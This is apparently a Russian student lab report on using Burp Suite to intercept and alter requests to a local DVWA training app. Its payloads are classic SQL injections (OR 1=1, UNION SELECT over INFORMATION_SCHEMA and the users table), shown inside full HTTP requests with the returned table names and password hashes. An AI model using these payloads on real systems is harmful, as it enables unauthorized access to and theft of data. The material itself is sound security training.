

Индивидуальный проект - этап 5

Полина Самарханова¹

18 марта, 2025, Москва, Россия

¹Российский Университет Дружбы Народов

Цели и задачи работы

Цель лабораторной работы

Целью данной работы является изучение приложения BurpSuite.

Процесс выполнения лабораторной работы

Burp Suite – это набор инструментов для тестирования безопасности веб-приложений. Этот инструмент используется для обнаружения уязвимостей, анализа трафика и проведения различных атак на веб-приложения, таких как XSS, SQL-инъекции и другие.

Burp Suite используется специалистами по безопасности, пентестерами и исследователями для:

- Поиска и анализа уязвимостей веб-приложений.
- Перехвата и анализа сетевого трафика.
- Автоматизации атак на веб-приложения.
- Оценки уровня защиты приложений.

SQL-инъекции – это тип уязвимости, который позволяет злоумышленникам выполнять произвольные SQL-запросы в базе данных через приложение. Это может привести к несанкционированному доступу к данным, их модификации или даже удалению.

SQL-инъекция возникает, когда приложение не корректно обрабатывает пользовательский ввод и включает его в SQL-запросы. Злоумышленники могут вставить (инъектировать) свои SQL-коды в вводимые данные, которые затем выполняются базой данных.

Работа перехватчика запросов



Рис. 1: Перехваченные данные

Подмена данных в запросе

```
1 POST /OWA/vulnerabilities/sqli/ HTTP/1.1
2 Host: localhost
3 Content-Length: 18
4 Cache-Control: max-age=0
5 sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"
6 sec-ch-ua-mobile: ?0
7 sec-ch-ua-platform: "Linux"
8 Upgrade-Insecure-Requests: 1
9 Origin: http://localhost
10 Content-Type: application/x-www-form-urlencoded
11 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
12 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
13 Sec-Fetch-Site: same-origin
14 Sec-Fetch-Mode: navigate
15 Sec-Fetch-User: ?1
16 Sec-Fetch-Dest: document
17 Referer: http://localhost/OWA/vulnerabilities/sqli/
18 Accept-Encoding: gzip, deflate, br
19 Accept-Language: en-US,en;q=0.9
20 Cookie: PHPSESSID=1rkf8n7mbk3fqfqt959w98tn; security=medium
21 Connection: close
22
23 id=1 OR 1=1&Submit=Submit
```

Рис. 2: Подмена запроса

Home

Instructions

Setup / Reset DB

Brute Force

Command Injection

CSRF

File Inclusion

File Upload

Insecure CAPTCHA

SQL Injection

SQL Injection (Blind)

Weak Session IDs

XSS (DOM)

XSS (Reflected)

XSS (Stored)

Vulnerability: SQL Injection

User ID:

ID: 1 OR 1=1#
First name: admin
Surname: admin

ID: 1 OR 1=1#
First name: Gordon
Surname: Brown

ID: 1 OR 1=1#
First name: Hack
Surname: Me

ID: 1 OR 1=1#
First name: Pablo
Surname: Picasso

ID: 1 OR 1=1#
First name: Bob
Surname: Smith

Рис. 3: Реакция на подмену

Теперь попробуем получить имена таблиц, для этого передадим такой запрос

```
1 OR 1=1 UNION SELECT \  
NULL, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES#
```

Подмена данных в запросе

```
1 POST /OWA/vulnerabilities/sqli/ HTTP/1.1
2 Host: localhost
3 Content-Length: 38
4 Cache-Control: max-age=0
5 sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"
6 sec-ch-ua-mobile: ?0
7 sec-ch-ua-platform: "Linux"
8 Upgrade-Insecure-Requests: 1
9 Origin: http://localhost
10 Content-Type: application/x-www-form-urlencoded
11 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
12 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
13 Sec-Fetch-Site: same-origin
14 Sec-Fetch-Mode: navigate
15 Sec-Fetch-User: ?1
16 Sec-Fetch-Dest: document
17 Referer: http://localhost/OWA/vulnerabilities/sqli/
18 Accept-Encoding: gzip, deflate, br
19 Accept-Language: en-US,en;q=0.9
20 Cookie: PHPSESSID=1rkf8k7dbk3f9efgt939w98tn; security=medium
21 Connection: close
22
23 id=1 OR 1=1 UNION SELECT NULL, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES#Submit=Submit
```

Рис. 4: Подмена запроса

```
First name:
Surname: INNODB_SYS_TABLES

ID: 1 OR 1=1 UNION SELECT NULL, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES#
First name:
Surname: INNODB_SYS_COLUMNS

ID: 1 OR 1=1 UNION SELECT NULL, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES#
First name:
Surname: INNODB_SYS_TABLESPACES

ID: 1 OR 1=1 UNION SELECT NULL, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES#
First name:
Surname: INNODB_SYS_INDEXES

ID: 1 OR 1=1 UNION SELECT NULL, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES#
First name:
Surname: INNODB_BUFFER_PAGE

ID: 1 OR 1=1 UNION SELECT NULL, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES#
First name:
Surname: INNODB_SYS_VIRTUAL

ID: 1 OR 1=1 UNION SELECT NULL, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES#
First name:
Surname: user_variables

ID: 1 OR 1=1 UNION SELECT NULL, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES#
First name:
Surname: INNODB_TABLESPACES_ENCRYPTION

ID: 1 OR 1=1 UNION SELECT NULL, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES#
First name:
Surname: INNODB_LOCK_WAITS

ID: 1 OR 1=1 UNION SELECT NULL, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES#
First name:
Surname: THREAD_POOL_STATS

ID: 1 OR 1=1 UNION SELECT NULL, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES#
First name:
Surname: guestbook

ID: 1 OR 1=1 UNION SELECT NULL, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES#
First name:
Surname: users
```

Рис. 5: Реакция на подмену

Подмена данных в запросе

Попробуем получить данные пользователей из таблицы users.

```
1 OR 1=1 UNION SELECT USER,PASSWORD FROM users#
```

Подмена данных в запросе

```
1 POST //DWA/vulnerabilities/sqli/ HTTP/1.1
2 Host: localhost
3 Content-Length: 18
4 Cache-Control: max-age=0
5 sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"
6 sec-ch-ua-mobile: ?0
7 sec-ch-ua-platform: "Linux"
8 Upgrade-Insecure-Requests: 1
9 Origin: http://localhost
10 Content-Type: application/x-www-form-urlencoded
11 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.119 Safari/537.36
12 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
13 Sec-Fetch-Site: same-origin
14 Sec-Fetch-Mode: navigate
15 Sec-Fetch-User: ?1
16 Sec-Fetch-Dest: document
17 Referer: http://localhost/DWA/vulnerabilities/sqli/
18 Accept-Encoding: gzip, deflate, br
19 Accept-Language: en-US,en;q=0.9
20 Cookie: PHPSESSID=1rkf8k7dnh3f9ef939e98rn; security=medium
21 Connection: close
22
23 id=1 OR 1=1 UNION SELECT USER,PASSWORD FROM users#&Submit=Submit
```

Рис. 6: Подмена запроса

Command Injection	ID: 1 OR 1=1 UNION SELECT USER,PASSWORD FROM users# First name: Gordon Surname: Brown
CSRF	
File Inclusion	
File Upload	ID: 1 OR 1=1 UNION SELECT USER,PASSWORD FROM users# First name: Hack Surname: Me
Insecure CAPTCHA	
SQL Injection	ID: 1 OR 1=1 UNION SELECT USER,PASSWORD FROM users# First name: Pablo Surname: Picasso
SQL Injection (Blind)	
Weak Session IDs	ID: 1 OR 1=1 UNION SELECT USER,PASSWORD FROM users# First name: Bob Surname: Smith
XSS (DOM)	ID: 1 OR 1=1 UNION SELECT USER,PASSWORD FROM users# First name: admin Surname: Sf4dcc3b5aa765d61d8327deb882cf99
XSS (Reflected)	ID: 1 OR 1=1 UNION SELECT USER,PASSWORD FROM users# First name: gordonb Surname: e99a18c428cb38d5f260853678922e03
XSS (Stored)	ID: 1 OR 1=1 UNION SELECT USER,PASSWORD FROM users# First name: 1337 Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
CSP Bypass	ID: 1 OR 1=1 UNION SELECT USER,PASSWORD FROM users# First name: pablo Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
JavaScript	ID: 1 OR 1=1 UNION SELECT USER,PASSWORD FROM users# First name: smithy Surname: Sf4dcc3b5aa765d61d8327deb882cf99
Authorisation Bypass	
Open HTTP Redirect	
DVWA Security	
PHP Info	
About	
Logout	

Рис. 7: Реакция на подмену

Выводы по проделанной работе

Мы изучили возможности BurpSuite.